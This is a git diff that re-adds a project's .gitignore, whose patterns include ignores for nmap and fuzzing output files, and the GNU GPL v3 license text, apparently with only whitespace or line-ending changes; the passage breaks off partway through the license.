diff --git a/.gitignore b/.gitignore index b32aed8..5376857 100644 --- a/.gitignore +++ b/.gitignore @@ -1,103 +1,103 @@ -# Byte-compiled / optimized / DLL files -__pycache__/ -*.py[cod] -*$py.class - -# C extensions -*.so - -# Distribution / packaging -.Python -env/ -build/ -develop-eggs/ -dist/ -downloads/ -eggs/ -.eggs/ -lib/ -lib64/ -parts/ -sdist/ -var/ -*.egg-info/ -.installed.cfg -*.egg - -# PyInstaller -# Usually these files are written by a python script from a template -# before PyInstaller builds the exe, so as to inject date/other infos into it. -*.manifest -*.spec - -# Installer logs -pip-log.txt -pip-delete-this-directory.txt - -# Unit test / coverage reports -htmlcov/ -.tox/ -.coverage -.coverage.* -.cache -nosetests.xml -coverage.xml -*,cover -.hypothesis/ - -# Translations -*.mo -*.pot - -# Django stuff: -*.log -local_settings.py - -# Flask stuff: -instance/ -.webassets-cache - -# Scrapy stuff: -.scrapy - -# Sphinx documentation -docs/_build/ - -# PyBuilder -target/ - -# IPython Notebook -.ipynb_checkpoints - -# pyenv -.python-version - -# celery beat schedule file -celerybeat-schedule - -# dotenv -.env - -# virtualenv -venv/ -ENV/ - -# Spyder project settings -.spyderproject - -# Rope project settings -.ropeproject - -# Misc -*.swp -*.swo -*.gnmap -*.nmap -*.xml -*.html -*.fuzz -*.req -*.txt -*~ - -reconnaissance/*.md +# Byte-compiled / optimized / DLL files +__pycache__/ +*.py[cod] +*$py.class + +# C extensions +*.so + +# Distribution / packaging +.Python +env/ +build/ +develop-eggs/ +dist/ +downloads/ +eggs/ +.eggs/ +lib/ +lib64/ +parts/ +sdist/ +var/ +*.egg-info/ +.installed.cfg +*.egg + +# PyInstaller +# Usually these files are written by a python script from a template +# before PyInstaller builds the exe, so as to inject date/other infos into it. +*.manifest +*.spec + +# Installer logs +pip-log.txt +pip-delete-this-directory.txt + +# Unit test / coverage reports +htmlcov/ +.tox/ +.coverage +.coverage.* +.cache +nosetests.xml +coverage.xml +*,cover +.hypothesis/ + +# Translations +*.mo +*.pot + +# Django stuff: +*.log +local_settings.py + +# Flask stuff: +instance/ +.webassets-cache + +# Scrapy stuff: +.scrapy + +# Sphinx documentation +docs/_build/ + +# PyBuilder +target/ + +# IPython Notebook +.ipynb_checkpoints + +# pyenv +.python-version + +# celery beat schedule file +celerybeat-schedule + +# dotenv +.env + +# virtualenv +venv/ +ENV/ + +# Spyder project settings +.spyderproject + +# Rope project settings +.ropeproject + +# Misc +*.swp +*.swo +*.gnmap +*.nmap +*.xml +*.html +*.fuzz +*.req +*.txt +*~ + +reconnaissance/*.md diff --git a/LICENSE b/LICENSE index 9cecc1d..c65825e 100644 --- a/LICENSE +++ b/LICENSE @@ -1,674 +1,674 @@ - GNU GENERAL PUBLIC LICENSE - Version 3, 29 June 2007 - - Copyright (C) 2007 Free Software Foundation, Inc. - Everyone is permitted to copy and distribute verbatim copies - of this license document, but changing it is not allowed. - - Preamble - - The GNU General Public License is a free, copyleft license for -software and other kinds of works. - - The licenses for most software and other practical works are designed -to take away your freedom to share and change the works. By contrast, -the GNU General Public License is intended to guarantee your freedom to -share and change all versions of a program--to make sure it remains free -software for all its users. We, the Free Software Foundation, use the -GNU General Public License for most of our software; it applies also to -any other work released this way by its authors. You can apply it to -your programs, too. - - When we speak of free software, we are referring to freedom, not -price. Our General Public Licenses are designed to make sure that you -have the freedom to distribute copies of free software (and charge for -them if you wish), that you receive source code or can get it if you -want it, that you can change the software or use pieces of it in new -free programs, and that you know you can do these things. - - To protect your rights, we need to prevent others from denying you -these rights or asking you to surrender the rights. Therefore, you have -certain responsibilities if you distribute copies of the software, or if -you modify it: responsibilities to respect the freedom of others. - - For example, if you distribute copies of such a program, whether -gratis or for a fee, you must pass on to the recipients the same -freedoms that you received. You must make sure that they, too, receive -or can get the source code. And you must show them these terms so they -know their rights. - - Developers that use the GNU GPL protect your rights with two steps: -(1) assert copyright on the software, and (2) offer you this License -giving you legal permission to copy, distribute and/or modify it. - - For the developers' and authors' protection, the GPL clearly explains -that there is no warranty for this free software. For both users' and -authors' sake, the GPL requires that modified versions be marked as -changed, so that their problems will not be attributed erroneously to -authors of previous versions. - - Some devices are designed to deny users access to install or run -modified versions of the software inside them, although the manufacturer -can do so. This is fundamentally incompatible with the aim of -protecting users' freedom to change the software. The systematic -pattern of such abuse occurs in the area of products for individuals to -use, which is precisely where it is most unacceptable. Therefore, we -have designed this version of the GPL to prohibit the practice for those -products. If such problems arise substantially in other domains, we -stand ready to extend this provision to those domains in future versions -of the GPL, as needed to protect the freedom of users. - - Finally, every program is threatened constantly by software patents. -States should not allow patents to restrict development and use of -software on general-purpose computers, but in those that do, we wish to -avoid the special danger that patents applied to a free program could -make it effectively proprietary. To prevent this, the GPL assures that -patents cannot be used to render the program non-free. - - The precise terms and conditions for copying, distribution and -modification follow. - - TERMS AND CONDITIONS - - 0. Definitions. - - "This License" refers to version 3 of the GNU General Public License. - - "Copyright" also means copyright-like laws that apply to other kinds of -works, such as semiconductor masks. - - "The Program" refers to any copyrightable work licensed under this -License. Each licensee is addressed as "you". "Licensees" and -"recipients" may be individuals or organizations. - - To "modify" a work means to copy from or adapt all or part of the work -in a fashion requiring copyright permission, other than the making of an -exact copy. The resulting work is called a "modified version" of the -earlier work or a work "based on" the earlier work. - - A "covered work" means either the unmodified Program or a work based -on the Program. - - To "propagate" a work means to do anything with it that, without -permission, would make you directly or secondarily liable for -infringement under applicable copyright law, except executing it on a -computer or modifying a private copy. Propagation includes copying, -distribution (with or without modification), making available to the -public, and in some countries other activities as well. - - To "convey" a work means any kind of propagation that enables other -parties to make or receive copies. Mere interaction with a user through -a computer network, with no transfer of a copy, is not conveying. - - An interactive user interface displays "Appropriate Legal Notices" -to the extent that it includes a convenient and prominently visible -feature that (1) displays an appropriate copyright notice, and (2) -tells the user that there is no warranty for the work (except to the -extent that warranties are provided), that licensees may convey the -work under this License, and how to view a copy of this License. If -the interface presents a list of user commands or options, such as a -menu, a prominent item in the list meets this criterion. - - 1. Source Code. - - The "source code" for a work means the preferred form of the work -for making modifications to it. "Object code" means any non-source -form of a work. - - A "Standard Interface" means an interface that either is an official -standard defined by a recognized standards body, or, in the case of -interfaces specified for a particular programming language, one that -is widely used among developers working in that language. - - The "System Libraries" of an executable work include anything, other -than the work as a whole, that (a) is included in the normal form of -packaging a Major Component, but which is not part of that Major -Component, and (b) serves only to enable use of the work with that -Major Component, or to implement a Standard Interface for which an -implementation is available to the public in source code form. A -"Major Component", in this context, means a major essential component -(kernel, window system, and so on) of the specific operating system -(if any) on which the executable work runs, or a compiler used to -produce the work, or an object code interpreter used to run it. - - The "Corresponding Source" for a work in object code form means all -the source code needed to generate, install, and (for an executable -work) run the object code and to modify the work, including scripts to -control those activities. However, it does not include the work's -System Libraries, or general-purpose tools or generally available free -programs which are used unmodified in performing those activities but -which are not part of the work. For example, Corresponding Source -includes interface definition files associated with source files for -the work, and the source code for shared libraries and dynamically -linked subprograms that the work is specifically designed to require, -such as by intimate data communication or control flow between those -subprograms and other parts of the work. - - The Corresponding Source need not include anything that users -can regenerate automatically from other parts of the Corresponding -Source. - - The Corresponding Source for a work in source code form is that -same work. - - 2. Basic Permissions. - - All rights granted under this License are granted for the term of -copyright on the Program, and are irrevocable provided the stated -conditions are met. This License explicitly affirms your unlimited -permission to run the unmodified Program. The output from running a -covered work is covered by this License only if the output, given its -content, constitutes a covered work. This License acknowledges your -rights of fair use or other equivalent, as provided by copyright law. - - You may make, run and propagate covered works that you do not -convey, without conditions so long as your license otherwise remains -in force. You may convey covered works to others for the sole purpose -of having them make modifications exclusively for you, or provide you -with facilities for running those works, provided that you comply with -the terms of this License in conveying all material for which you do -not control copyright. Those thus making or running the covered works -for you must do so exclusively on your behalf, under your direction -and control, on terms that prohibit them from making any copies of -your copyrighted material outside their relationship with you. - - Conveying under any other circumstances is permitted solely under -the conditions stated below. Sublicensing is not allowed; section 10 -makes it unnecessary. - - 3. Protecting Users' Legal Rights From Anti-Circumvention Law. - - No covered work shall be deemed part of an effective technological -measure under any applicable law fulfilling obligations under article -11 of the WIPO copyright treaty adopted on 20 December 1996, or -similar laws prohibiting or restricting circumvention of such -measures. - - When you convey a covered work, you waive any legal power to forbid -circumvention of technological measures to the extent such circumvention -is effected by exercising rights under this License with respect to -the covered work, and you disclaim any intention to limit operation or -modification of the work as a means of enforcing, against the work's -users, your or third parties' legal rights to forbid circumvention of -technological measures. - - 4. Conveying Verbatim Copies. - - You may convey verbatim copies of the Program's source code as you -receive it, in any medium, provided that you conspicuously and -appropriately publish on each copy an appropriate copyright notice; -keep intact all notices stating that this License and any -non-permissive terms added in accord with section 7 apply to the code; -keep intact all notices of the absence of any warranty; and give all -recipients a copy of this License along with the Program. - - You may charge any price or no price for each copy that you convey, -and you may offer support or warranty protection for a fee. - - 5. Conveying Modified Source Versions. - - You may convey a work based on the Program, or the modifications to -produce it from the Program, in the form of source code under the -terms of section 4, provided that you also meet all of these conditions: - - a) The work must carry prominent notices stating that you modified - it, and giving a relevant date. - - b) The work must carry prominent notices stating that it is - released under this License and any conditions added under section - 7. This requirement modifies the requirement in section 4 to - "keep intact all notices". - - c) You must license the entire work, as a whole, under this - License to anyone who comes into possession of a copy. This - License will therefore apply, along with any applicable section 7 - additional terms, to the whole of the work, and all its parts, - regardless of how they are packaged. This License gives no - permission to license the work in any other way, but it does not - invalidate such permission if you have separately received it. - - d) If the work has interactive user interfaces, each must display - Appropriate Legal Notices; however, if the Program has interactive - interfaces that do not display Appropriate Legal Notices, your - work need not make them do so. - - A compilation of a covered work with other separate and independent -works, which are not by their nature extensions of the covered work, -and which are not combined with it such as to form a larger program, -in or on a volume of a storage or distribution medium, is called an -"aggregate" if the compilation and its resulting copyright are not -used to limit the access or legal rights of the compilation's users -beyond what the individual works permit. Inclusion of a covered work -in an aggregate does not cause this License to apply to the other -parts of the aggregate. - - 6. Conveying Non-Source Forms. - - You may convey a covered work in object code form under the terms -of sections 4 and 5, provided that you also convey the -machine-readable Corresponding Source under the terms of this License, -in one of these ways: - - a) Convey the object code in, or embodied in, a physical product - (including a physical distribution medium), accompanied by the - Corresponding Source fixed on a durable physical medium - customarily used for software interchange. - - b) Convey the object code in, or embodied in, a physical product - (including a physical distribution medium), accompanied by a - written offer, valid for at least three years and valid for as - long as you offer spare parts or customer support for that product - model, to give anyone who possesses the object code either (1) a - copy of the Corresponding Source for all the software in the - product that is covered by this License, on a durable physical - medium customarily used for software interchange, for a price no - more than your reasonable cost of physically performing this - conveying of source, or (2) access to copy the - Corresponding Source from a network server at no charge. - - c) Convey individual copies of the object code with a copy of the - written offer to provide the Corresponding Source. This - alternative is allowed only occasionally and noncommercially, and - only if you received the object code with such an offer, in accord - with subsection 6b. - - d) Convey the object code by offering access from a designated - place (gratis or for a charge), and offer equivalent access to the - Corresponding Source in the same way through the same place at no - further charge. You need not require recipients to copy the - Corresponding Source along with the object code. If the place to - copy the object code is a network server, the Corresponding Source - may be on a different server (operated by you or a third party) - that supports equivalent copying facilities, provided you maintain - clear directions next to the object code saying where to find the - Corresponding Source. Regardless of what server hosts the - Corresponding Source, you remain obligated to ensure that it is - available for as long as needed to satisfy these requirements. - - e) Convey the object code using peer-to-peer transmission, provided - you inform other peers where the object code and Corresponding - Source of the work are being offered to the general public at no - charge under subsection 6d. - - A separable portion of the object code, whose source code is excluded -from the Corresponding Source as a System Library, need not be -included in conveying the object code work. - - A "User Product" is either (1) a "consumer product", which means any -tangible personal property which is normally used for personal, family, -or household purposes, or (2) anything designed or sold for incorporation -into a dwelling. In determining whether a product is a consumer product, -doubtful cases shall be resolved in favor of coverage. For a particular -product received by a particular user, "normally used" refers to a -typical or common use of that class of product, regardless of the status -of the particular user or of the way in which the particular user -actually uses, or expects or is expected to use, the product. A product -is a consumer product regardless of whether the product has substantial -commercial, industrial or non-consumer uses, unless such uses represent -the only significant mode of use of the product. - - "Installation Information" for a User Product means any methods, -procedures, authorization keys, or other information required to install -and execute modified versions of a covered work in that User Product from -a modified version of its Corresponding Source. The information must -suffice to ensure that the continued functioning of the modified object -code is in no case prevented or interfered with solely because -modification has been made. - - If you convey an object code work under this section in, or with, or -specifically for use in, a User Product, and the conveying occurs as -part of a transaction in which the right of possession and use of the -User Product is transferred to the recipient in perpetuity or for a -fixed term (regardless of how the transaction is characterized), the -Corresponding Source conveyed under this section must be accompanied -by the Installation Information. But this requirement does not apply -if neither you nor any third party retains the ability to install -modified object code on the User Product (for example, the work has -been installed in ROM). - - The requirement to provide Installation Information does not include a -requirement to continue to provide support service, warranty, or updates -for a work that has been modified or installed by the recipient, or for -the User Product in which it has been modified or installed. Access to a -network may be denied when the modification itself materially and -adversely affects the operation of the network or violates the rules and -protocols for communication across the network. - - Corresponding Source conveyed, and Installation Information provided, -in accord with this section must be in a format that is publicly -documented (and with an implementation available to the public in -source code form), and must require no special password or key for -unpacking, reading or copying. - - 7. Additional Terms. - - "Additional permissions" are terms that supplement the terms of this -License by making exceptions from one or more of its conditions. -Additional permissions that are applicable to the entire Program shall -be treated as though they were included in this License, to the extent -that they are valid under applicable law. If additional permissions -apply only to part of the Program, that part may be used separately -under those permissions, but the entire Program remains governed by -this License without regard to the additional permissions. - - When you convey a copy of a covered work, you may at your option -remove any additional permissions from that copy, or from any part of -it. (Additional permissions may be written to require their own -removal in certain cases when you modify the work.) You may place -additional permissions on material, added by you to a covered work, -for which you have or can give appropriate copyright permission. - - Notwithstanding any other provision of this License, for material you -add to a covered work, you may (if authorized by the copyright holders of -that material) supplement the terms of this License with terms: - - a) Disclaiming warranty or limiting liability differently from the - terms of sections 15 and 16 of this License; or - - b) Requiring preservation of specified reasonable legal notices or - author attributions in that material or in the Appropriate Legal - Notices displayed by works containing it; or - - c) Prohibiting misrepresentation of the origin of that material, or - requiring that modified versions of such material be marked in - reasonable ways as different from the original version; or - - d) Limiting the use for publicity purposes of names of licensors or - authors of the material; or - - e) Declining to grant rights under trademark law for use of some - trade names, trademarks, or service marks; or - - f) Requiring indemnification of licensors and authors of that - material by anyone who conveys the material (or modified versions of - it) with contractual assumptions of liability to the recipient, for - any liability that these contractual assumptions directly impose on - those licensors and authors. - - All other non-permissive additional terms are considered "further -restrictions" within the meaning of section 10. If the Program as you -received it, or any part of it, contains a notice stating that it is -governed by this License along with a term that is a further -restriction, you may remove that term. If a license document contains -a further restriction but permits relicensing or conveying under this -License, you may add to a covered work material governed by the terms -of that license document, provided that the further restriction does -not survive such relicensing or conveying. - - If you add terms to a covered work in accord with this section, you -must place, in the relevant source files, a statement of the -additional terms that apply to those files, or a notice indicating -where to find the applicable terms. - - Additional terms, permissive or non-permissive, may be stated in the -form of a separately written license, or stated as exceptions; -the above requirements apply either way. - - 8. Termination. - - You may not propagate or modify a covered work except as expressly -provided under this License. Any attempt otherwise to propagate or -modify it is void, and will automatically terminate your rights under -this License (including any patent licenses granted under the third -paragraph of section 11). - - However, if you cease all violation of this License, then your -license from a particular copyright holder is reinstated (a) -provisionally, unless and until the copyright holder explicitly and -finally terminates your license, and (b) permanently, if the copyright -holder fails to notify you of the violation by some reasonable means -prior to 60 days after the cessation. - - Moreover, your license from a particular copyright holder is -reinstated permanently if the copyright holder notifies you of the -violation by some reasonable means, this is the first time you have -received notice of violation of this License (for any work) from that -copyright holder, and you cure the violation prior to 30 days after -your receipt of the notice. - - Termination of your rights under this section does not terminate the -licenses of parties who have received copies or rights from you under -this License. If your rights have been terminated and not permanently -reinstated, you do not qualify to receive new licenses for the same -material under section 10. - - 9. Acceptance Not Required for Having Copies. - - You are not required to accept this License in order to receive or -run a copy of the Program. Ancillary propagation of a covered work -occurring solely as a consequence of using peer-to-peer transmission -to receive a copy likewise does not require acceptance. However, -nothing other than this License grants you permission to propagate or -modify any covered work. These actions infringe copyright if you do -not accept this License. Therefore, by modifying or propagating a -covered work, you indicate your acceptance of this License to do so. - - 10. Automatic Licensing of Downstream Recipients. - - Each time you convey a covered work, the recipient automatically -receives a license from the original licensors, to run, modify and -propagate that work, subject to this License. You are not responsible -for enforcing compliance by third parties with this License. - - An "entity transaction" is a transaction transferring control of an -organization, or substantially all assets of one, or subdividing an -organization, or merging organizations. If propagation of a covered -work results from an entity transaction, each party to that -transaction who receives a copy of the work also receives whatever -licenses to the work the party's predecessor in interest had or could -give under the previous paragraph, plus a right to possession of the -Corresponding Source of the work from the predecessor in interest, if -the predecessor has it or can get it with reasonable efforts. - - You may not impose any further restrictions on the exercise of the -rights granted or affirmed under this License. For example, you may -not impose a license fee, royalty, or other charge for exercise of -rights granted under this License, and you may not initiate litigation -(including a cross-claim or counterclaim in a lawsuit) alleging that -any patent claim is infringed by making, using, selling, offering for -sale, or importing the Program or any portion of it. - - 11. Patents. - - A "contributor" is a copyright holder who authorizes use under this -License of the Program or a work on which the Program is based. The -work thus licensed is called the contributor's "contributor version". - - A contributor's "essential patent claims" are all patent claims -owned or controlled by the contributor, whether already acquired or -hereafter acquired, that would be infringed by some manner, permitted -by this License, of making, using, or selling its contributor version, -but do not include claims that would be infringed only as a -consequence of further modification of the contributor version. For -purposes of this definition, "control" includes the right to grant -patent sublicenses in a manner consistent with the requirements of -this License. - - Each contributor grants you a non-exclusive, worldwide, royalty-free -patent license under the contributor's essential patent claims, to -make, use, sell, offer for sale, import and otherwise run, modify and -propagate the contents of its contributor version. - - In the following three paragraphs, a "patent license" is any express -agreement or commitment, however denominated, not to enforce a patent -(such as an express permission to practice a patent or covenant not to -sue for patent infringement). To "grant" such a patent license to a -party means to make such an agreement or commitment not to enforce a -patent against the party. - - If you convey a covered work, knowingly relying on a patent license, -and the Corresponding Source of the work is not available for anyone -to copy, free of charge and under the terms of this License, through a -publicly available network server or other readily accessible means, -then you must either (1) cause the Corresponding Source to be so -available, or (2) arrange to deprive yourself of the benefit of the -patent license for this particular work, or (3) arrange, in a manner -consistent with the requirements of this License, to extend the patent -license to downstream recipients. "Knowingly relying" means you have -actual knowledge that, but for the patent license, your conveying the -covered work in a country, or your recipient's use of the covered work -in a country, would infringe one or more identifiable patents in that -country that you have reason to believe are valid. - - If, pursuant to or in connection with a single transaction or -arrangement, you convey, or propagate by procuring conveyance of, a -covered work, and grant a patent license to some of the parties -receiving the covered work authorizing them to use, propagate, modify -or convey a specific copy of the covered work, then the patent license -you grant is automatically extended to all recipients of the covered -work and works based on it. - - A patent license is "discriminatory" if it does not include within -the scope of its coverage, prohibits the exercise of, or is -conditioned on the non-exercise of one or more of the rights that are -specifically granted under this License. You may not convey a covered -work if you are a party to an arrangement with a third party that is -in the business of distributing software, under which you make payment -to the third party based on the extent of your activity of conveying -the work, and under which the third party grants, to any of the -parties who would receive the covered work from you, a discriminatory -patent license (a) in connection with copies of the covered work -conveyed by you (or copies made from those copies), or (b) primarily -for and in connection with specific products or compilations that -contain the covered work, unless you entered into that arrangement, -or that patent license was granted, prior to 28 March 2007. - - Nothing in this License shall be construed as excluding or limiting -any implied license or other defenses to infringement that may -otherwise be available to you under applicable patent law. - - 12. No Surrender of Others' Freedom. - - If conditions are imposed on you (whether by court order, agreement or -otherwise) that contradict the conditions of this License, they do not -excuse you from the conditions of this License. If you cannot convey a -covered work so as to satisfy simultaneously your obligations under this -License and any other pertinent obligations, then as a consequence you may -not convey it at all. For example, if you agree to terms that obligate you -to collect a royalty for further conveying from those to whom you convey -the Program, the only way you could satisfy both those terms and this -License would be to refrain entirely from conveying the Program. - - 13. Use with the GNU Affero General Public License. - - Notwithstanding any other provision of this License, you have -permission to link or combine any covered work with a work licensed -under version 3 of the GNU Affero General Public License into a single -combined work, and to convey the resulting work. The terms of this -License will continue to apply to the part which is the covered work, -but the special requirements of the GNU Affero General Public License, -section 13, concerning interaction through a network will apply to the -combination as such. - - 14. Revised Versions of this License. - - The Free Software Foundation may publish revised and/or new versions of -the GNU General Public License from time to time. Such new versions will -be similar in spirit to the present version, but may differ in detail to -address new problems or concerns. - - Each version is given a distinguishing version number. If the -Program specifies that a certain numbered version of the GNU General -Public License "or any later version" applies to it, you have the -option of following the terms and conditions either of that numbered -version or of any later version published by the Free Software -Foundation. If the Program does not specify a version number of the -GNU General Public License, you may choose any version ever published -by the Free Software Foundation. - - If the Program specifies that a proxy can decide which future -versions of the GNU General Public License can be used, that proxy's -public statement of acceptance of a version permanently authorizes you -to choose that version for the Program. - - Later license versions may give you additional or different -permissions. However, no additional obligations are imposed on any -author or copyright holder as a result of your choosing to follow a -later version. - - 15. Disclaimer of Warranty. - - THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY -APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT -HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY -OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, -THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR -PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM -IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF -ALL NECESSARY SERVICING, REPAIR OR CORRECTION. - - 16. Limitation of Liability. - - IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING -WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS -THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY -GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE -USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF -DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD -PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), -EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF -SUCH DAMAGES. - - 17. Interpretation of Sections 15 and 16. - - If the disclaimer of warranty and limitation of liability provided -above cannot be given local legal effect according to their terms, -reviewing courts shall apply local law that most closely approximates -an absolute waiver of all civil liability in connection with the -Program, unless a warranty or assumption of liability accompanies a -copy of the Program in return for a fee. - - END OF TERMS AND CONDITIONS - - How to Apply These Terms to Your New Programs - - If you develop a new program, and you want it to be of the greatest -possible use to the public, the best way to achieve this is to make it -free software which everyone can redistribute and change under these terms. - - To do so, attach the following notices to the program. It is safest -to attach them to the start of each source file to most effectively -state the exclusion of warranty; and each file should have at least -the "copyright" line and a pointer to where the full notice is found. - - {one line to give the program's name and a brief idea of what it does.} - Copyright (C) {year} {name of author} - - This program is free software: you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation, either version 3 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program. If not, see . - -Also add information on how to contact you by electronic and paper mail. - - If the program does terminal interaction, make it output a short -notice like this when it starts in an interactive mode: - - {project} Copyright (C) {year} {fullname} - This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. - This is free software, and you are welcome to redistribute it - under certain conditions; type `show c' for details. - -The hypothetical commands `show w' and `show c' should show the appropriate -parts of the General Public License. Of course, your program's commands -might be different; for a GUI interface, you would use an "about box". - - You should also get your employer (if you work as a programmer) or school, -if any, to sign a "copyright disclaimer" for the program, if necessary. -For more information on this, and how to apply and follow the GNU GPL, see -. - - The GNU General Public License does not permit incorporating your program -into proprietary programs. If your program is a subroutine library, you -may consider it more useful to permit linking proprietary applications with -the library. If this is what you want to do, use the GNU Lesser General -Public License instead of this License. But first, please read -. + GNU GENERAL PUBLIC LICENSE + Version 3, 29 June 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU General Public License is a free, copyleft license for +software and other kinds of works. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +the GNU General Public License is intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. We, the Free Software Foundation, use the +GNU General Public License for most of our software; it applies also to +any other work released this way by its authors. You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + To protect your rights, we need to prevent others from denying you +these rights or asking you to surrender the rights. Therefore, you have +certain responsibilities if you distribute copies of the software, or if +you modify it: responsibilities to respect the freedom of others. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must pass on to the recipients the same +freedoms that you received. You must make sure that they, too, receive +or can get the source code. And you must show them these terms so they +know their rights. + + Developers that use the GNU GPL protect your rights with two steps: +(1) assert copyright on the software, and (2) offer you this License +giving you legal permission to copy, distribute and/or modify it. + + For the developers' and authors' protection, the GPL clearly explains +that there is no warranty for this free software. For both users' and +authors' sake, the GPL requires that modified versions be marked as +changed, so that their problems will not be attributed erroneously to +authors of previous versions. + + Some devices are designed to deny users access to install or run +modified versions of the software inside them, although the manufacturer +can do so. This is fundamentally incompatible with the aim of +protecting users' freedom to change the software. The systematic +pattern of such abuse occurs in the area of products for individuals to +use, which is precisely where it is most unacceptable. Therefore, we +have designed this version of the GPL to prohibit the practice for those +products. If such problems arise substantially in other domains, we +stand ready to extend this provision to those domains in future versions +of the GPL, as needed to protect the freedom of users. + + Finally, every program is threatened constantly by software patents. +States should not allow patents to restrict development and use of +software on general-purpose computers, but in those that do, we wish to +avoid the special danger that patents applied to a free program could +make it effectively proprietary. To prevent this, the GPL assures that +patents cannot be used to render the program non-free. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. + + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all 